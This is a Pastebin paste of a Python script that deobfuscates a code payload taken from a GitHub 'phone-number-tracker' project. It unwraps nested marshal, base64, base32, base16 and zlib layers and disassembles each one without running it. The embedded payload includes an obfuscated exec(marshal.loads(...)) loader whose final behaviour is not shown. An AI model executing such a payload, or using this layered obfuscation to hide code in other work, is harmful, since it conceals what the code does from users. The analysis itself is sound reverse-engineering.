API tools faq
paste
dan-masek

Deobfuscating some python code.

dan-masek
May 16th, 2021 (edited)
360
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 12.14 KB | None | 0 0
raw download clone embed print report
  1. import base64
  2. import dis
  3. import marshal
  4. import zlib
  5.  
  6. # payload extracted from https://github.com/ShuBhamg0sain/phone-number-tracker/blob/master/tracker.py
  7.  
  8. PAYLOAD = 'c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs/)\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9c(\x00\x00IyBPYmZ1c2NhdGVkIGJ5IFB5IENvbXBpbGUKIyBDcmVhdGVkIGJ5IEhUUi1URUNIIChodHRwczovL2dpdGh1Yi5jb20vaHRyLXRlY2gpCiMgSW5zdGFncmFtIDogQHRhaG1pZC5yYXlhdAoKaW1wb3J0IG1hcnNoYWwsYmFzZTY0CmV4ZWMobWFyc2hhbC5sb2FkcyhiYXNlNjQuYjMyZGVjb2RlKCJNTUFBQUFBQUFBQUFBQUFEQUFBQUFRQUFBQUFIR05RQUFBQUdJQUFBTVFBUUEzQUFBQk5BQUFERUFBQUdJQUlBTlFBUUFXUUJBQlNRQUFES0FJQUdLQUlBTklCUUFaQUNBQ0JRQ0FFREFFQUdJQUlBQVJLV0lBSUFLTVVBR0FBQUFCVTc3Nzc3NzVISEhYQVJBQUFHS1NUWEdGV0RPWTJUSEZDSEE2TElNWkhEUzJMU0ZOVlRLUlpWS0oyV1E2QldNTlVVNDZCV0pRWkRHUjNDR01aVzQyWkxPWktWSzNDRE5GQVZVVVNSS0JJR09PS09NWVhTNjQzRUpGNFRFVUNNTk5aREdTSlBHWktGQVNCUEtBMlhPTUQySVFaVkFWQ0dLQVhUT09LRUc1R1ZPTDMySEIzSEs1UzJGNTJXUTUzS0Y1M0cyNFJUT1pTREtLM1lNTkVWTTRaUk1WRUNXM1RHR0pLRkdRSlpNSTNTV05KUkdWVlRTVkJaRjRaVEEyVEtPUlVXTVZUTk01NEM2TDNXTEJYSE1MM0JOTkVIQTRSWUc1NUZNTkxMT1lZR01MWlNORkRXS1ZUU0dOSURBVDNaTUpYRlFVWlBIQlRHRVRSTE5RWFhBVExNSzQyRTZaWlBORlpITVNKUE9aWVM2NTJPRjQ0V1lUMlVNSk1DNk9DVUY1VkhHNVRHT1ozRkFZSlhJWjJHTUxaVE9aNFhFT0tVSkJJREVaVFpNSjVESU5SWkhCRlNXWktaSVJSRklRU1ZPUk1XTVYyQkpKSUVRVEtSSzRWVUlMMkNOQllUTTJTV0lJMkVTWkRLS0YzWFU1Q1BJTk1WQ0wzWktOS1RNNUxaSUZEWEFSM0RLRlVEUVVTWE9CQVVZNExMUEpHVTJOM1dPWkxIRVVMVU9BMlRJVTIyTU5WWEc0VFhLVkxESVFKWElWTVVDTDNETVJGRkNWWlBJSkdFSzMzREdWM0dTVTJCTlpCRkNRUlZONVRVU1ZLR0lGTkVTMktDSkZVR09VU0pJWldVT1RESE01S1VTM0tQR0pDRlVUMldMSlRYS1QyT05STVdNTktEUEU0RzZXRFFHUldWR1MzWEpCSVZVU1RQSTVZR01OSlNOWjRFRzIySEtOM1RRT0RZSUpWVzJOMk1JVVhXMjVER0hGRFVRNUxGS0ZMR0dPQlVLVldFNlYzV0lWUkc2U1NDTVkySEtZM1RLVlhUSVMyWUlSRFU2WUxFSVk0Rk81UkxIRlVYT1ZMVkpWSldHWjNSUEZXRUtNM1ZLQkVGQ1JCWUpKWEUyWlpQSkkzREtSQ1ZKVkhDV1lMTVBGSVc2NEJVTlZXV0tMM1RPSklXWTUzS0o0WlU2M0tXSVI0WENTRENPRk1XUVVLSkc1REVHUVpVR0JFR01RTElNNURFU1JEWko1VFRRWkRZR1kzRlFZU09LVllWSzJLT0tFWFZDNDJFS0k0R09VQ1NKWkZFR1IyVE5OTVZRUUpUS0pTSEUzMllGTlhXNlMyUkpOWFc0WkpVT0JEV0lZU0ZKRkxVUzRaUU01MkVRTURQUEU0RE9WQ1ZNTlRYUVdLSE9OWldTU1NGS05KVzQ1Mk1LQjRFUVkyRUpGU1cyUzNZSkpDRUMyM01HRlNFMlkzVktaR0VLUktISUZWV0dSMkJJNDRETTJMRktNMkVDM0pMTEZMR1dZU0xQSlpYRzJLQ0tORlVFTkNKSVZYVUVPS1pPQjJYQTIzVUtSUkdXV0JQTVZSV0czUlFONVJGSTZEUkdCTEVFNTJYTklaRVVZMk1LSkpHT1MzVE1WWVRNTUtJTkZKRUVaU0dKNVVHNjJUTklaSFdZWjNQT05DRk1VM1BLTTRWS1VSVE5SRUVZMlNWSU1ZRUlXQ1NNSlJWR1NKVkpaTUVFWTJQTk1WVVNSRENLSkNYUzNDRExCRUdXNkRRR0JZVENVREtHTkZVTVIyMk5OVlZHNTJXSk5DWEVWRFNOSkNVV0xaV05NM0dPNTNUSjUyVUsyRFdHVkxVTVJESk01WFU2WkxSTEZJRFMzVEdHTkVUQ1UzR0dOWUdLWlNYRjVFWENVS1FJWjNGR1JDWFBCRlhHVlRUS0ZUWEdUUlpLWlpUUzZUT0lOWkVZNFRGTlI0VE1NVFhJTjRYTTVTU0tWUkhJNlRCS1VaSFU2U0lLRkpUT1IzVklOVlVDVkJQTU5XRFM2SlNQQkZXWTVTVk5ORUU2UVJQTEpSV0daVERKTjRYVVMyUk5aSFVFT0JMTVE0VU0yRFhJUlZURTVDUU1NM1U0TVRDTTVHRkM2Q1dPVTNEUVVKTEpaNFhLTVNXUEpUVEc1RERLVTRGQzJCUkc0WFVTNFRSSkZTRVVNUlZNNURFVVRLWUtGWEdZU0JWS0pVRlMzUlpLQTJUSVZaUE9WVFdHVUNCSjVVRk00M0lHSjRWSTRKTElSUVVVNDJGTU5LRkNOUlBQQllVRzNDSUdSSEVTWTNHS0ZHVkVZVElPWlVUTVVUMkpSMlRHSzJUTEJHU1c1M1hHSTNFNk9LMlBKU0U0NFJZSU5YR0c1UlhPRldTV00zRlBKSlhPM1NHSlpGVlMyQ1VKRTNUU1pTWVBKS1VDUkNFTkJDV1UzU1RHUkpXTTJDRklGRlRRMlRaR0ZNR0k2RDJLQlJFMlUyUk01M1VHNDNWRzVHWEc0U0hLNU1XTVJUWU80WFdHV0tQTEpJVlFOTEtNRkpVQ1VaWU9aWlhPUlNaSUY0RFFNTFBPSk5HNllSVUhCWkc0TVNCTEZNVUM0WlpLUlZHMlNDU0hGUkRLMlRMTkZUQ1c0S05KQTRYUTZLVEdKVVRDWkJXTlFWVEdMMkZLRTNISVFLUU5SVFU0VFJSSEIzVEtUQ1NLSllHWVRaVE1WSERNNktYTklaRUtNUkxPNUhVRVVUWEpOWVRPVVRVSzVWR0tPTFNJUkpGQzMySk5aSkRDVDNZSkZISEVTTFhJNDJIVU4zMkpCUVVHVkJWTkZYWE8yM01HNFpHU1FMSUtRWlRTNUxORk5YRkdRUllNSlhUR1dCUk5SR1dRUlQyR0pIR1MzVFlPUlZWSTIyTkxCWVdRMzJPT0JHRTI1REdNRTNHSU0zRU1ORFcyWTNQS0JESEE1RFFQRTNXWTRMSElNM0ZRNURHT1JERVUzRFFORlJFSzIzUk01VkRJWjJMR0pDVkNOTElJNFZVT04yR09SV1ZRSzMySkZLV0dSSlZGTllIVUtaWEdOMlhHU0pQSVZaVzZSMkZJUlJITzRKUE9aUVZPM1NNSVZLVkFTU1RJWVlDNlFKVU9RMlZLUUpUTVZNUzZUS09ORlVHRzNSVkpGTERFWjNTTzVKRE9VS1BNTk1IQ01LWUtaVVVVTkxEUEZOQzY2TFVJRlJGR1RTUk1STFVFUjNFTVZHRklORE5JRllHNFlSWElFVlhVNUJYSU5JR1lZVFpHWkdFNlNEVUpSTkdVMzJRTkEzRk9SSlRLWjJHTzVSUkpCWkdDUVpYSzVZR1dZVFVQQkhYUVZTUEpaTEVLVlRQTTVLSFVaVENOSktIQzVCUE80MkU0UzNLSVpWRklTM0NOUlpHS1RMR0pKMlZJVlpTS1JDVksyTFpKUklUTVNMWUY1UVZFM0pTS0ZGVVk0RE5ORjNGTVQzTE5aQkc2U0NKSEZWREUzM0pMRlNFRzNEMklOUkdPVFNSRjVNVTZWRE5LNFZYVU1STE1SNFVNNkpTT0o1Rkc2UzJOSkJGRVdDQk1WU0VRV0tOTTVaVEEzWlJPUkJXSVJERklFM0hDMjNNTU5UV01TMk1NUllWSTIzRE1GNFdNVERPT1ZRVE0zQ0NJWlpVNjRTVUxGQVVJUktTTlZHV0k0VEZORkJVNEszSE1OTEZDM1NMR0o1RElZVFBKTkJXSVpLRUlONFc2UVNYS0Y0RUVUS1dIRVhWR04zRE80NFhPM0tCT1ZLRlNOUlNJVjNHVzZMTFBCM0ZJNVNMT0pJV1M0Q1ZHRlNHNDVSVk9KV1VJVVNKTVpTWENaMkNORlhHQzVTU0dCS0VFMkxRS0ZCVENSRFFGTjRHR05aV01aQlZBU0pRT1JDWElWTEpPSlRYTzJTVUtBWkcyTjJXSU5ORVkySlBJNVRGRzREVEpSS1RLMjJKR0pJREdUTE9OTkhIS04zUUxGRlRDUzNPR1pKVFFaREZQSVpYQ1dCWUpSSVVPVDNCSTVCVlNOM0dQSktVUzRERU5JWkhTWkJWRjVZRzQyMzJHQlNXS01aUU5WUlVLUjJDS1pBVzRZS1pQQlVYS1ZKV0dKM0dLWkxFTTRaRFNPS0hHWkRIT1lUVkhCNFRTU0tIR1EySE01RFRLUkNYUUwyUkdWNFRRNkJWRzUyVUtNQ0VLRjVGVVFTWU1SRVVJT0syUEZUVEMzWlpHQlhFWTJTU01OSkVRVEMyS0VZWEc2QlFNTlVGVVVaU1BCMkhBNUJTSkZLRUdRS0tPTVZUS1NUTUdGWkdJWktPSjVHRUNOSlRNRlpXSVJLWktKU1ZLTkJWR1ZMV1VSS0xOWVpYSU5US0paSEdPVkwyUEZMRkFNM0RLVlRUS1QyWVBKRFhLWTNTTTVMWEM0S09LNTRFTU5SWk5OUVVFWVNZTEYzSENXTEpQQkFXS1pUSUhGVFVTM0xGSlIyRVFaSkxORkhHWVdCVUxKQVVRTDJET0laR0lXS1NOTkhUTzNDMlBKWlRDWTJIT0JVWENWU0ZOWlRGS09MT05SR0VVVkNITzVLRzRORFRJRkhUQVRTQktKWEZRUlRQTlEzV0MzMlNORVpFSVUzSk01SlVNWlpSTU5YR1UzS0hKVllFT1JESk1KS1hHVTJOT0ZDVEVRVExHRkZFV1NLWExKSVM2NFpQS1ZWRU9RVE1KVkZEU1lMSUs1NUVLNENUT0VZRzZWWlBJSVlVTU9LSk5CSERFM0JTT000V1M0Q1BKSTNFMlMyUU5aM0dZVlNOSjVNV1lLM0xNWkVFNllTVk9OR0dFVlJaTVZDRUMyMkNPNVdHMllTVkZONEZHSzNKSkpZV0tOSlhJSjNHUTZUWUtSTUZNNTNIR1pFRlNTU0hOVkJIUzRTSk9aSEdLUkxCT1ZHRU9VQlJNVlZYU1pEV05GUVhLWkJWR0kzR1k0U09KRkpHMjRSWE1WR0ZPV0JRTEZHSElORFZJWkRWSzMyRE9KRFZNVERETlpZWEFXVFNJVktHSVJMSUtCSUU0MlJRR0pTRzI1MjJNNVJYS1JUSE1KUlhFWkwyTkFYV0dUUlVKSk1FS1kyQklWR1ZNU1RMSlZVRE9VQlhHUkdWTUwzT081RlRRVlNOS1pHSE1VMlNPWk1HV09KUk5GMlM2UkNDTVpKVFFSU0xLVVhXUzQyVkdSTVdVV0NaTEJXRUs0Q0lLUkRETTUzRVBCM1VLM0RXTkJaVlNMM0NHNUpFMlZLU0pRMlRFVEJQT04yVVkyVFFNUTNXRVVERUtORkc2VkRWS1JHVVFVRFhLTkRET01DTkpWUkVRWktHTk5TVEE0U0VLRkxVNDZTVEc0WUdHU0tCS0o0VEU0Mk1HUTJVRzRUR0dWUkhBUTNTSjRWVTJVRE1OUklVQ1IzQ0tOWFZHTkRaSVkzVkVLWlpLNFlXT1RCVE5OVFhDWkpYT1JSVUUzS01LVlRVVU9LUUtKMkhHWVRHTVZKR1lWQ0VNVjRUTTJES01SWUVRVVNOR0JORTRNM05HTjRXNFRDS0lSRUVZWTJKSVpKRE8zQ1JOTVlEU1MzSE9SSEhVU0RNS1ZNVzJZVEdLWlJFR1pTSEs1VlVFTTNDT0o0VkNUUlRPTkxVQ1dKUU9GS0dNUTNGTVVaREdRM1pIQVlVTVNTTUs1RVRJM0RGS0ZHRVc2SlFKVTRGQzZLUU80WUc2WlNRTEpZRlVUS0tMQklURVZTT0xJWVZRVUNQUEVYVkNSTEZKQklIVVJMWk5GM1dTVFROR0pMRkM1S0lQRTRHMjJSWUdCQlVVT0tLS1pOR0UyQ05LUk1WQzNaWE1WUkhHWjJES0pZRzZOMlRKWk5FSTNTSk9CVlVJV0NGSEJZVkVUQ1FGNFlIU1JKWU9VMlVTMzNKTUpWVEdTM0RMQlRHMk9DSUlWVldRV1RMUEE0SFNUM0JNVlNGT1NKVEdSRVZJT0RaSlozV0c1Q1FIQkxVVzJLUkZOUkRFTUJUSlZORzJVU1BKWklGQU9EVU1FVldLVUJMSUZKSFM1TEhNNUtWUUwzR041RkVPVFNMR0JSRUUyMkxKRklWVTZEUUtCQkZTSzJWS0U0RlFaSkxNTk1VQzRMQ0s1R0RHVkRRSEJNV0k1QldLUTRFNlozTkdFVlZBTVRSRzVURk1SVFdNVktHTzZMVVBCWEZRNkRTTlJEVE9PTDJHTkhER1NTR1BKVEhLUlJZRzVFVE9NMkpKNUxGUTJMUUxCMlhRNUQyS01aSEdaUllNUlJYSVNUVE1SSERNTTJaS1JXV0lOS1JJSkZWUVpaWkk1WVdVVEQyTVJTRE1UQlRNUkVHNldMS0lFNFRDWTJITlZMSEFVQlRLQjRIRVJUU081R0VVWjJESVEyVUUzM1ZPSkpTNldLSUtKSFZFUlJYUEEzQ1dWMlFORjVGQVdDR09RWlM2VkRDTUZLSEE0WlhGTkhFWVNDU05KVkZTM0NCT1JaVEdPRFpLNVJUSTNCU09WV0ZNVFNaUEJaRVU1QlNOQkJXNE9MWUdaM0ZFVTJOR1FYVkU1TFVPNVJGRVdCUU5aVVVHVUxMR0UzV1FTM1VNUkNVNjRURk9GWEhLTkRZUEZWRVczU09LRTNHMllTVE5WTVhVUktRS0pTVlFaRFpPUlVXQ1UzWEhGVVVXUjJOT0paVE9OS0hOWVlVTTVMWU5WVURPU1RQTkI0SFFaM0xOQTNXWTJETkdVWlhVNEpMTzVDSEE2SldQSlhYU1RTS09JM0hNNExDSk5EVFM1TEhQQllESVIzTktCVFZBTlNKSVlZVk8yTENJSk1VMlNUWUpaNFZVUVNHTkpSVENTRFBMQldYSTVTVEZOWldXVkJMTU5IWEdWMkxPNUxUS0szSE1aQlRTU0pYUEZZWFU0REpKNUdDNjRMVU9OUVc0NUpXTUpTVk1TMlFHVTJXR1IzWUxKSUZTUlNVUEpIRktUMlJKWktFNFpUSU1GMkc2MzIyS0ZYUzZSTERNWkJGSzVMRFBCVFVZWkNRSkJXR1VaTFJHTlRURzJaVUdVNEZNNFRWTlZFVTZNU0ZLSkdEUzRDRkdCU0ZVTUpZT0pIR1U0Mk9PTVlGS1lLRU5WTFZHWkRMS0JMV0tUU0tNUkJIS1EzQ01SUlVPMjNGSkZUVkdMM0tJTkxXTVREMk1RNEVJTjNFTjVYR000QzJKSlNETUwyQ0xGSkVRV0ROSkpUSElXQllQSjRXV1dSUlBKM1dTTkJTSkZJVUVXVEJHQjJGQU1TU0lOU1RNU0pRTlJVVVEzUlVPQkVWUTVaUUxKNFRJNkJRR1pNVlFRVEJOQjVGR1JMT0o1R0RBUkRSTkY1SE9aWlZOWlFXU1RLWkdSQ0dFV0tUTzU1RkFSUlFKVjNYTTJLTk1SRFdXNVNMSkVaRVVVQ0hGTjVFWVpUU09SWEdNUkRKTVJEVkVUUkxKSjJWRzJMTEtaRUZNVksyRjVNVUkzWldHRTJTV1NCU0Y1SUZJUzJXUEU0UzZaRFJOUkZXV1MyWU5JNEVDUVRUR0pGRENVM1BKWVhWS05DUkpaRFRPMktCSkJZREU1SllKRlhVQ0syWE9JMlZVNUJQT1k0QzZWU01PUlhVMlZETUs1NENXVFNQSU5MSEk2S1dNTldGUVdSU0xKUVU0TUpST1ZKRVdSM0VKQVZXUVJES0dGUVdHVExKSU5NVTRPS1lOTVpITTJMTUpSMlZBNFRaRk5FR0M1QlBLNVpUT1dCVUdCSVhJUkpSSVpXVFFVQ0JHWlFXS09CTEpVWlhNVEwySUZLR0dXS05KQkRXSTRLUUdWQ1RDV0NETU1aRkk2U0RKRkhUTVRTSkhGR1RDWkRQTlYzREs1U1BQSk5EUVZSVktCM0UyMzJOTlpVVzZOS0lNVkdHNk5MVktGMlVDU0pQSkJMVEE1WlRJWkxIQzMyWUlNMkdVM1NGTkpNV0UzVENNRlpYQVdMS0dZM1dTV1RPR0JVVU9XQ0dPWkdGVTVMSEZOMkRTVFpWTEJNVkdRSllPTkxXTTZSUkpWWFdPM0NTTlZKVks2Q01OTkVWQ1QzUE1SUkUyNVRYSkJWWFUzS0tKVTNVSVIzRktOVUVZNVROSVpHVlNTVEJHNURUS1lMV0pGTFdNU0RPTkJGVU80M1dGTVpXVUszSE81NUZPWVpVR0IyRE9NU0VNSkNIRTNEWExKWVdZMzJYSEIyV1lXUzJPRldVSVMySE9RWUNXVlNGTlFZVTRTVENJRjVIUzZCU09CMlZVTUtPSEFZRUVOQ1dLTjVHWVdLVE9aTEc0NURZTEEyVkEyM0JNUkpFMk5DMkpWWlM2WUtPSEEzVTJTQ0VPRkdEU1lLS01NWFdFMzJHR1JNVE9VVElJTkxIRVoyREs1RERFTURJS0JaRTIzU0tPQktFTU1TV09ZNERHWktXSU5ZRk1TU1FNSk1GQzZTRks1SkhFVFMyTlJOQzY0RFlLSjNIU1RUSEtNMkUyV0JQR0JKVU9NMkRMSkRFUTRMSEhCWFhTNVJRSkE0VVVZUlJLUTNWUVZTTU9JNERDVjNJRjVKVUszTENHTlRIVTJMSU9GSVZJNlRQSVJKRktSMldQRkFUQ1NDTEs1R0VRT0pUTEVaVE9UU0JNVk1UR1MyS0tGQVU0WkNETkFYVUdUU0pJTTNVQzNDVU1aRkZBU0tUR05YWEM1SlpLSllWUzJTQ081R1dVVFNYTEZXR0VVVEVLVTJERVVMUk1OV1VDT0pTT1JMRVdSS1pHSlJXUTVEVVBCTVhVM1NQT0o0RTJVSlZLSjRYRTNTMkxGR0VLVFJWSzVIRkNUU1NOQldFU1IyQ0tOR0RTTlNMR0pLRTZXVFFPWlhYSzZCV01aSlhPWlNJSVJIRUlVQ0lKRVpVS1dDQ01GWldFMlRVSkUzSFM0S0JHNUhES1UyWEpWMkZDWUxES1ZGRlE2S0tLUlRYR1ZLTU5GVlVRTURETEE0VzRWMkpKUkVWQVZERkpaQ0dNTkNWT0pGSFVWWlpMRVlWQVRDSE1SSERNV1NRT0ZCREdNU1lNRVpVMkwyVExCRldRMjNLSEJSVTJXVEJOUktIT09LWU81RUZPT0NUTkpGRUtPS1lQRlhVSVNSVU5OUkRBVENOTkI1R0laRFNNSjNHWTUyVkdGRkRBTDJWSVJYR09ZTENONUdITTJEMko1VVVPMkxQT0FaRlVXQ0tKSkRVS1JDWkdKV1hJTlpWS1ZESFFWWlJKUkZHRzRCWlBBWlRFV0JZTjVaRktTWkxHSTJFTVIyRExGVVUyVDNDT1JCVVVNS0xLWVpHWVkyRUtWWlhPNENXR0JDVVNVM1BHSVlWS1dLQk5aQ1NXVUsyTU5DR0VPRE9KNDRUQ1dDUklGRVhVMzNHTEpYWElVUzJMQlZXSTNaUE5aWkhHUjJSTVJCRFFSQ0NKWTJVMlZTQk40WVhVVFNGS0ZEVkVRS1JMSkZXU1VLQlBCWldVMkNESkJFSFEyQ0NLNVZYUU9EUkxKQVRBUVRLTEJFRkNSU1NOTkJERzNTQ081TkVFVUtET0JCRkNSREdJTkRHTTRUVUs1NFVXMlNYTUpKRzZZS1NLTlZGRzMyQklGUVVTWjMyRk5ERUkzQ0RLRkVXV1VTUklWQVNXU0NOT05BVTIyQ0JHQkJGRVIyRk81SkVVNlNMTU5BVVcySllLSkNVRVoySkhCSUVTWjNMSUVaR0daUlBPWlhHRUwzWEdOMkdXM1NNSkJBVDJQSklBUUFBQUFEVUFRQUFBQUQyTlJVV0U1QUdBQUFBQVlUQk9OU1RNTkRVQklBQUFBREVNVlJXNjNMUU9KU1hHNDNVQkVBQUFBRENHWTJHSVpMRE41U0dLS0FBQUFBQUFLQUFBQUFBQUtBQUFBQUFBNFlDQUFBQUFaREhPUUVBQUFBQUhSV1c2WkRWTlJTVDRCSUFBQUFIR0FRQUFBQUJRQUk9IikpKQ==(\x02\x00\x00\x00t\x06\x00\x00\x00base64t\t\x00\x00\x00b64decode(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x02\x00\x00\x00dgt\x08\x00\x00\x00<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x02\x00\x00\x00dgt\x08\x00\x00\x00<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x0c\x01'
  9.  
  10. l1 = marshal.loads(PAYLOAD)
  11. print("Names", l1.co_names)
  12. print(dis.dis(l1.co_code))
  13.  
  14. l2 = marshal.loads(l1.co_consts[2])
  15.  
  16. print("Names", l2.co_names)
  17. print(dis.dis(l2.co_code))
  18.  
  19. l3 = base64.b64decode(l2.co_consts[2])
  20. l3_str = l3.split('"')[1]
  21.  
  22. l4 = marshal.loads(base64.b32decode(l3_str))
  23. print("Names", l4.co_names)
  24. print(dis.dis(l4.co_code))
  25.  
  26. l4_str = l4.co_consts[2]
  27.  
  28. l4_bin = base64.b64decode(l4_str)
  29.  
  30. l5 = zlib.decompress(l4_bin)
  31. l5_str = l5.split('"')[1]
  32.  
  33. l5_bin = base64.b64decode(l5_str)
  34. l6 = marshal.loads(zlib.decompress(l5_bin))
  35. print("Names", l6.co_names)
  36. print(dis.dis(l6.co_code))
  37.  
  38. l7 = base64.b32decode(l6.co_consts[2])
  39. l8 = marshal.loads(zlib.decompress(l7))
  40. print("Names", l8.co_names)
  41. print(dis.dis(l8.co_code))
  42.  
  43. l9 = base64.b16decode(l8.co_consts[2])
  44. l10 = marshal.loads(zlib.decompress(l9))
  45. print("Names", l10.co_names)
  46. print(dis.dis(l10.co_code))
  47.  
  48. l11 = base64.b64decode(l10.co_consts[2])
  49.  
  50. with open('deobfuscated.py', 'w') as f:
  51.     f.write(l11)
  52.  
  53.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!